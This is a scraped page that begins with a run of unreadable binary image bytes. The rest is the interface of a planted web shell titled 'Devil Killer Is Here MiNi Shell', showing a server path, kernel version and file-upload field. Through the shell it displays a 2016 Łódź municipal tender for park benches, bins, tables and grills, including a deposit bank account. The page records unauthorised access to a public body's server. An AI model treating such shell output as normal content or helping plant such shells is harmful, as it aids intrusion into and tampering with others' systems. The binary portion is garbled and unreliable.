JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160516/122404-N-2016.html

<p class="kh_header"><b>Łódź: Dostawa i montaż elementów małej architektury na obiektach rekreacyjnych: Młynek i Stawy Jana</b><br>
<b>Numer ogłoszenia: 122404 - 2016; data zamieszczenia: 16.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 27 21 417, faks 42 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż elementów małej architektury na obiektach rekreacyjnych: Młynek i Stawy Jana.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem niniejszego postępowania jest dostawa i montaż elementów małej architektury na obiektach rekreacyjnych Młynek i Stawy Jana realizowanego według opisu:
Część 1 - dostawa i montaż elementów małej architektury na obiekcie rekreacyjnym Młynek; 
Zamówienie obejmuje dostawę i montaż:
1. ławka betonowa - 25 szt. o następujących parametrach:
a) ławki do wkopania w podłożu nieutwardzonym (głębokość wkopania minimum 40 cm);
b) podstawy wykonane z wysokogatunkowego betonu  płukanego z fakturą zewnętrzną grysu granitowego klasy minimum B30; 
c) siedzisko i oparcie wykonane z desek drzewa liściastego lub egzotycznego o grubości minimum 4 cm, zabezpieczonych przed działaniem korozji biologicznej malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
d) wymiary:
	- długość całkowita: 205 cm (+/-2 cm),
	- wysokość siedziska po wkopaniu: 42 cm (+/-2 cm),
	- wysokość oparcia po wkopaniu: 80 cm (+/-2 cm),
	- długość siedziska (części drewnianej): 180cm (+/-2 cm),
	- głębokość siedziska 46 cm (+/-2 cm),
	- ciężar ławki: minimum 150 kg;
e) elementy stalowe ławki zabezpieczone antykorozyjne i malowane na czarno lub wykonane ze stali ocynkowanej ogniowo.
Sposób montażu: Ławkę należy trwale zamocować poprzez wkopanie jej w gruncie
i posadowienie jej na ławie cementowo-piaskowej o grubości minimum 15 cm, na wskazanym obiekcie. 
Do każdej ławki należy dostarczyć dodatkowo po jednym drewnianym elemencie siedziska, zabezpieczonym i malowanym w identyczny sposób, jak zamontowane w opisywanych ławkach.

2. kosz na odpadki - 22 szt. o następujących parametrach:
a) w podstawie trapez wykonany z wysokogatunkowego betonu płukanego,
z fakturą zewnętrzną z grysu granitowego klasy minimum B30;

b) pojemność minimum 70 l pojemności wkładu;
c) kosz wyposażony w daszek ze stali zabezpieczonej antykorozyjnie;
d) wymiary:
   	- szerokość 65/40 cm (+/-2 cm),
    	- wysokość z daszkiem 95 cm (+/-2 cm),
	- ciężar: minimum 250 kg
f) wkład wykonany z blachy ocynkowanej o grubości minimum 0,5 mm;
g) kosze montowane na podłożu nieutwardzonym w sposób stabilny.
 
Dodatkowo wraz z koszami należy dostarczyć trzy dodatkowe wkłady oraz trzy daszki malowane tak samo, jak zamawiane kosze. Wszystkie dodatkowe elementy muszą być zabezpieczone antykorozyjnie tak, jak w zamówieniu. 

3. kosz na psie odchody - 8 szt. o następujących parametrach:

a) elementy stalowe koszy zabezpieczone antykorozyjnie;
b) kosze wyposażone w odpowiednie oznaczenie określające jego przeznaczenie malowane w kolorze pomarańcz średni (RAL 2003);

c) otwory wrzutowe zabezpieczone ruchomą klapką;
d) wymiary:
- wysokość: 60 cm (+/-2 cm)
- średnica 35 cm (+/- 2 cm)
- zawieszony na wysokości 46 cm (+/- 2 cm)
e) powinny posiadać możliwość mocowania worka foliowego.

Sposób montażu: kosze wkopywane na głębokość minimum 50 cm, zabetonowane w podłożu lub przymocowane do betonowej prefabrykowanej stopy fundamentowej.

4. stół rekreacyjny - 4 szt. o następujących parametrach:
a) stół wykonany z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z grysu granitowego klasy minimum B-30;
b) blat wykonany z szlifowanego betonu, lakierowany specjalnym lakierem zabezpieczającym jego powierzchnię przed wpływem warunków atmosferycznych;
c) krawędź stołu wykończona listwą z  polerowanego aluminium;
d) wymiary:
	- grubość blatu 8 cm (+/-1 cm), 
	- średnica blatu 120 cm (+/-2 cm), 
	- wysokość stołu 80 cm (+/-2 cm),
	- średnica całkowita 223 cm (+/-2 cm), 
	- poglądowe wymiary słupka prezentują rysunki.
e) siedziska wykonane z wysokogatunkowego betonu płukanego z fakturą zewnętrzną 
z grysu granitowego klasy minimum B-30;
f) siedziska w kształcie koła wykończone listwami drewnianymi o grubości minimum 4 cm wykonane z drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej,  malowane lakierobejcą do wymalowań zewnętrznych 
w kolorze orzech ciemny;
g) wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi i malowane w kolorze czarnym, lub wykonane ze stali ocynkowanej ogniowo.

Do każdego stołu należy dostarczyć po trzy dodatkowe drewniane klepki z każdego rodzaju występującego na  siedzisku o tych samych wymiarach, kolorze i sposobie impregnacji  jakie zostaną zastosowane w zamawianych stołach.

Sposób montażu: mocowany w podłożu  miękkim na prefabrykowanych stopach fundamentowych.

5. stojak na rowery - 4 szt. o parametrach zgodnych z Zarządzeniem nr 3303/V/09 Prezydenta Miasta Łodzi z dnia 25 czerwca 2009 r. w sprawie wprowadzenia wytycznych do planowania, projektowania i utrzymania dróg rowerowych w Łodzi:
a) kształt stojaków rowerowych możliwie prosty;
b) wykonywanie z trwałych materiałów, odpornych na wpływ warunków atmosferycznych (w tym przed korozją);
c) trwale przymocowane do podłoża;
d) wymaga się, aby stojaki dla rowerów, niezależnie od typu roweru, umożliwiały oparcie roweru oraz przypięcie do stojaka ramy i jednego koła roweru przy pomocy pojedynczego zapięcia typu U-lock (kłódką szeklową);
e) zaleca się także, aby jeden stojak dla rowerów umożliwiał przypięcie drugiego koła za pomocą drugiego zapięcia;
f) w kształcie odwróconej litery U, umożliwiający oparcie i przypięcie, co najmniej 2 rowerów niezależnie od rozmiaru ramy, szerokości opony czy też kształtu kierownicy;
g) wymiary:
- długość ok. 100 cm (+/- 2 cm), 
- wysokość 60-80 cm (+/-2 cm), 
- średnica rury 5-9 cm (+/-2 cm).

Miejsce dostawy i montażu: obiekt rekreacyjny Młynek, Łódź ul. Śląska 168.

Część 2 - dostawa i montaż elementów małej architektury - na miejsce do grillowania, na obiekcie rekreacyjnym Młynek i Stawy Jana;

Zamówienie obejmuje dostawę i montaż:

1. stół parkowy - 6 szt. o następujących parametrach:
a) stół wykonany z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z grysu granitowego klasy minimum B-30;
b) blat wykonany z szlifowanego betonu, lakierowany specjalnym lakierem zabezpieczającym jego powierzchnię przed wpływem warunków atmosferycznych;
c) krawędź stołu wykończona kątownikiem z  polerowanego aluminium;
d) wymiary:
	- grubość blatu 6 cm (+/- 1 cm),
	- blat 90x200 cm (+/- 2 cm),
	- wysokość stołu 78 cm (+/- 2 cm),
	- szerokość całkowita 200 cm (+/- 2 cm),
	- długość całkowita 200 cm (+/- 2 cm).
e) siedziska wykonane z trzech listew (na jednej ławie) drewnianych o grubości minimum 4 cm z drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej;
f) malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
g) wymiary:
	- szerokość ławy 40 cm (+/- 2 cm),
	- wysokość ławy 45  cm (+/- 2 cm); 
	h) wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi 
           i malowane w kolorze czarnym, lub wykonane ze stali ocynkowanej ogniowo.

Do każdego stołu należy dostarczyć po jednej drewnianej listwie siedziska o tych samych wymiarach, kolorze i sposobie impregnacji, jakie zostaną zastosowane w zamawianych stołach. 

Sposób montażu: mocowanie w podłożu miękkim na prefabrykowanych stopach fundamentowych za pomocą odpowiednich kołków rozporowych.

Miejsce dostawy i montażu:
- 3 sztuki należy dostarczyć i zamontować na obiekcie Stawy Jana Łódź, ul. Rzgowska 247;
- 3 sztuki należy dostarczyć i zamontować na obiekcie Młynek Łódź, ul. Śląska 168.

2.  ławka parkowa betonowa - 6 szt. o następujących parametrach:
a) ławki wykonane z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z  grysu granitowego klasy minimum B-30;
b) ławka musi posiadać kształt przypominający wycinek koła; 
c) siedzisko wykonane z  listew drewnianych o grubości minimum 4 cm wykonane
z  drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej,  malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
d) wymiary:
	- szerokość ławki 43 cm (+/- 2 cm), 
	- wysokość ławki 45 cm (+/- 2 cm),
	- długość całkowita 157 cm (+/- 2 cm);
      e)  wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi i 	malowane w kolorze czarnym lub ocynkowane ogniowo.

Do każdej ławki należy dostarczyć po trzy drewniane listwy siedziska o tych samych wymiarach, kolorze i sposobie impregnacji, jakie zostaną zastosowane w zamawianych ławkach.
 
Miejsce dostawy i montażu: ławki należy dostarczyć i zamontować na obiekcie Młynek Łódź, ul. Śląska 168.

3. grill parkowy - 3 szt. o następujących parametrach:

a) grille wykonane z  wysokogatunkowego betonu płukanego z fakturą zewnętrzną z  grysu granitowego (dotyczy tylko blatu roboczego) klasy min. B-30;
b) pozostałe części urządzenia malowane farbami do podłoży betonowych;  
c) okrągłe palenisko grilla musi być wykonane z betonu odpornego na wysokie temperatury (około 1300°C);
d) nad paleniskiem umieszczony ma być okrągły ruszt z możliwością regulacji jego położenia nad paleniskiem;
e) wokół paleniska ma być umieszczony okrągły blat roboczy wykonany z betonu o fakturze zewnętrznej z grysu granitowego zabezpieczony przed uszkodzeniem krawędzi listwą z polerowanego aluminium;
f) wymiary:
	- minimalna wysokość blatu od podłoża 34 cm (+/- 2 cm),
	- średnica blatu 120 cm (+/- 2 cm),
	- wysokość urządzenia 175 cm (+/- 2 cm);
g)  wszystkie elementy stalowe zabezpieczone antykorozyjnie;
h)  w ramach dostawy należy dołączyć dodatkowo jeden ruszt wraz z łańcuchem, na którym jest zawieszony.

Miejsce dostawy i montażu: obiekt rekreacyjny Młynek, Łódź ul. Śląska 168.

4. kosz na popiół i odpadki z grilla - 6 szt. o następujących parametrach:
a) kosz na popiół z grilla o wymiarach 80x80x80 cm (+/-2 cm), wykonany z blachy stalowej zabezpieczonej antykorozyjnie malowany w kolorze RAL 2002 lub zbliżonym;
b) perforacja obudowy kosza ma zapewnić wszechstronną wentylację. Wokół  obudowy należy umieścić  napisy popiół z grilla;
c) napisy muszą być trwale połączone z obudową lub wycięte w ściankach obudowy;
d) obudowa kosza musi posiadać możliwość mocowania do podłoża utwardzonego, oraz centrowania stalowego wkładu;
e) pokrywa kosza wyposażona w otwór wrzutowy o średnicy 42 cm (+/- 2 cm), zabezpieczony kratką uniemożliwiającą wrzucanie większych odpadków, zamocowana na zawiasach przystosowana do zamknięcia na kłódkę;
f) parametry pojemnika wewnętrznego: 
- pojemnik wewnętrzny o wymiarach średnicy 45 cm (+/- 2 cm),
- wysokość 75 cm (+/- 2 cm);
- wykonany z blachy stalowej ocynkowanej lub malowany farbami odpornymi na wysokie temperatury w kolorze szarym.  

 Miejsce dostawy i montażu:
- 3 sztuki:  obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247
- 3 sztuki:  obiekt rekreacyjny Młynek, Łódź ul. Śląska 168.
Część 3 - dostawa i montaż ławek metalowych na obiekcie rekreacyjnym Stawy Jana.

Zamówienie obejmuje dostawę i montaż:

1. skate ławka - 4 szt. o następujących parametrach: 
a) konstrukcja ławki wykonana ma być z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
b) stalowe elementy ławki ocynkowane ogniowo;
c) siedzisko ławki wykonane z rur stalowych ocynkowanych ogniowo o średnicy zewnętrznej 38 mm  (+/-2 mm), grubość ścianki 2,6 mm  (+/-0,2 mm);
d) podnóżek wykonany z rury stalowej ocynkowanej ogniowo o średnicy 38 mm (+/-2 mm), grubość ścianki 2,6 mm (+/-0,2 mm);
e) wszystkie końcówki rur zabezpieczone zaślepkami z tworzywa sztucznego;
f) wymiary:
- ławka o długości 150 cm (+/-2 cm), 
- siedzisko na wysokości 80 cm (+/-2 cm), 
- podnóżek na wysokości 46 cm (+/-2 cm).

Dodatkowo wraz z ławką należy dostarczyć trzy zapasowe zaślepki do rur siedziska. 

Sposób montażu: ławkę należy mocować trwale w gruncie przy pomocy prefabrykowanych stóp fundamentowych, lub w każdy inny sposób, który spowoduje pewne i stabilne mocowanie ławki z podłożem;

Miejsce dostawy i montażu: obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247


2. skate ławka - 2 szt. o następujących parametrach: 
a) konstrukcja ławki wykonana ma być z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
b) stalowe elementy ławki ocynkowane ogniowo;
c) pomiędzy główną ramą ławki, która zrobiona jest z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
d) wbudowane jest siedzisko z rur stalowych ocynkowanych ogniowo o śr. zew. 38Mm (+/-2 mm), gr. ścianki 2,6mm (+/-0,2 mm);
e) wszystkie końcówki rur zabezpieczone zaślepkami z tworzywa sztucznego;
f) ławkę należy mocować trwale w gruncie metodą mokrą przez zalanie nóg ławki zaprawą betonową. 
g) poglądowe wymiary ławki prezentują rysunki;
h) montaż ławki musi zapewnić jej pewne trwałe i stabilne mocowanie  z podłożem;
i) do każdej  ławki należy dostarczyć trzy zapasowe zaślepki do rur siedziska. 

Miejsce dostawy i montażu:obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247

3. słupek zabezpieczający - 5 szt. o następujących parametrach:
a) konstrukcja słupka wykonana ma być z rury stalowej ocynkowanej ogniowo średnicy zewnętrznej 76,1 mm (+/-2 mm) grubości ścianki 3,2 mm (+/-0,2 mm);
b) słupek  należy mocować trwale w gruncie metodą mokrą przez zalanie nóg słupka zaprawą betonową;
c) montaż słupka musi zapewnić mu pewne trwałe i stabilne mocowanie  z podłożem. 

Miejsce dostawy i montażu: obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247

II. Wykonawca jest zobowiązany: 
1. dostarczyć i wykonać montaż przedmiotu Umowy Zamawiającemu do obiektu MOSiR w Łodzi, pod adresem wskazanym przez Zamawiającego, we wskazanych na obiekcie miejscach w terminie wskazanym w pkt. 4 SIWZ co strony potwierdzą pisemnie protokołem przekazania;
2. wykonać przedmiot umowy zgodnie z zasadami wiedzy technicznej oraz obowiązującymi przepisami;
3. w przypadku, gdy dostarczony przedmiot Umowy będzie niekompletny lub będzie zawierał wady, zostanie to odnotowane w Protokole odbioru, tym przypadku Wykonawca zobowiązany będzie w dodatkowym terminie, wyznaczonym przez Zamawiającego dostarczyć / wymienić na własny koszt przedmiot Umowy brakujący i / lub wolny od wad;
4. powiadomić Zamawiającego w terminie do 7 dni o planowanym terminie rozpoczęcia dostawy i montażu przedmiotu umowy;
5. udzielić Zamawiającemu potrzebnych informacji o stosunkach faktycznych i prawnych dotyczących towaru oraz wydać Zamawiającemu stosowne dokumenty;
6. w przypadku, gdy jest to niezbędne do prawidłowego korzystania, załączy informację dotyczącą sposobu korzystania;
7. wydać przedmiot umowy zgodnie z wymaganiami Zamawiającego;
8. w przypadku dostarczenia towaru uszkodzonego, złej jakości, wymienić je na własny koszt w terminie do 5 dni roboczych, przy czym Zamawiającemu przysługuje naliczenie kar umownych, o których mowa w § 5 projektu umowy;
9. udzielić na przedmiot umowy rękojmi na okres ... miesięcy zgodny ze złożonym formularzem ofertowym na elementy betonowe i stalowe oraz na okres 24 miesięcy na elementy drewniane, z wyłączeniem uszkodzeń mechanicznych powstałych w trakcie użytkowania;
10. do posiadania polisy ubezpieczeniowej, ważnej nie później niż od daty podpisania umowy do czasu odbioru końcowego obejmującej ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej kontraktowej w związku z realizacją niniejszej umowy, ubezpieczenie od zniszczenia wszelkiej własności spowodowanego działaniem, zaniechaniem lub niedopatrzeniem pracowników Wykonawcy w wysokości nie mniejszej niż wartość niniejszej umowy.

III. Sporządzona oferta musi być zgodna z przedmiotem zamówienia. Do oferty należy dołączyć:
1. fotografie lub ilustracje katalogowe produktów odzwierciedlające ich faktyczny stan wizualny, 
2. szczegółowy opis proponowanych produktów, parametry, wymiary, dane techniczne,
3. instrukcję sposobu montażu.

Zamawiający zastrzega, że wszystkie podane w opisie wzory produktów (zdjęcia) nie mają na celu naruszenia art. 29 Ust. 3 Ustawy z dn 29.01.2004 Prawo Zamówień Publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań wizualnych. 
Ilekroć w SIWZ, zostało wskazane pochodzenie materiałów lub wskazanie norm, aprobat, parametrów, specyfikacji jakościowych, użytkowych, funkcjonalnych i technicznych, specyfikacji technicznych lub systemów odniesień, o których mowa w art. 30 ust. 1-3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ. Ciężar udowodnienia równoważności produktów w stosunku do wymogu określonego przez zamawiającego spoczywa na Wykonawcy.  Jako zasadę przyjmuje się wymóg, że należy przyjąć stosowanie elementów spełniających normy i parametry techniczne nie gorsze w zakresie parametrów technicznych, jakościowych użytkowych oraz funkcjonalnych od elementów wskazanych w tym opisie. Wymaga się bezwzględnie zachowania parametrów jakościowych, estetycznych, materiałowych, wielkościowych, kolorystycznych, technologicznych, bezpieczeństwa i gwarancji minimum zgodnych z elementami wskazanymi w opisie. Składając ofertę Wykonawca winien dołączyć zdjęcie, ilustrację katalogową z techniczną informacją dotyczącą elementu (w tym wymiary i wykaz materiałów użytych do wytworzenia poszczególnych elementów sposób montażu w gruncie). Wykonawca składając ofertę jest zobowiązany udowodnić, że oferowane produkty spełniają założenia projektu.  W przypadku ewentualnej zmiany na materiały równoważne Wykonawca do oferty przetargowej zobowiązany jest dołączyć wszystkie wymagane dokumenty (tj. karty techniczne, aprobaty techniczne)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>17.2. Zamawiający przewiduje udzielenie zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 34.92.84.80-6, 39.12.12.00-8, 42.21.41.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8. WYMAGANIA DOTYCZĄCE WADIUM
8.1. Zamawiający zgodnie z art. 45 ustawy Pzp żąda od Wykonawcy wniesienia wadium w wysokości: 
8.1.1. na część 1 - 1700,00 złotych (słownie: jeden tysiąc siedemset złotych 00/100),
8.1.2. na część 2 - 1500,00 złotych (słownie: jeden tysiąc pięćset złotych 00/100 PLN),
8.1.3. na część 3 - 300,00 złotych (słownie: trzysta złotych 00/100).
8.2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku formach wymienionych w art. 45 ust. 6 ustawy Pzp, tj.:
8.2.1. pieniądzu,
8.2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
8.2.3. gwarancjach bankowych,
8.2.4. gwarancjach ubezpieczeniowych, 
8.2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (jt. Dz. U. z 2014 r., poz. 1804).
8.3. Wadium wnoszone w pieniądzu winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. Wpłaty pieniężnej należy dokonać przelewem na konto Zamawiającego nr: Bank: Getin Noble Bank S.A. Nr: 37 1560 0013 2027 1935 0505 0002 w tytule przelewu powołując się na nr referencyjny postępowania 08/16/PN - część ...*, 
	* należy wpisać nr części: 1, 2 lub 3, której wnoszone wadium dotyczy.
8.4. Jeśli wadium zostało wniesione w pieniądzu to zaleca się, aby oryginał lub kserokopia poświadczona za zgodność z oryginałem dowodu wniesienia wadium (dokonania przelewu bankowego) załączono do oferty.
8.5. Jeśli wadium zostało wniesione w innej formie niż w pieniądzu to do oferty należy załączyć kserokopię poświadczoną za zgodność z oryginałem, natomiast oryginał należy załączyć do oferty w sposób uniemożliwiający jego zaginięcie, pozwalający jednak na jego zwrot bez dekompletowania oferty - oryginał nie może być na trwałe zespolony z ofertą. W przypadku niezastosowania się do powyższego zwrot oryginału będzie niemożliwy.
8.6. W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji, dokumenty te powinny być sporządzone zgodnie z obowiązującym prawem i zawierać, co najmniej:
8.6.1. nazwę dającego zlecenie (Wykonawcy), beneficjenta poręczenia/gwarancji (Zamawiającego), poręczyciela/gwaranta, oraz wskazanie ich siedzib,
8.6.2. określenie wierzytelności, która ma być zabezpieczona poręczeniem/gwarancją,
8.6.3. kwotę wadium,
8.6.4. termin ważności poręczenia/gwarancji - nie krótszy niż termin związania ofertą,
8.6.5. zobowiązanie poręczyciela/gwaranta do zapłacenia kwoty wadium bezwarunkowo na pierwsze pisemne żądanie Zamawiającego w sytuacji, jeżeli Wykonawca:
8.6.5.1. w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, lub informacji o tym, że nie należy do grupy kapitałowej nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
8.6.5.2.  którego oferta została wybrana:
8.6.5.2.1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
8.6.5.2.2. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
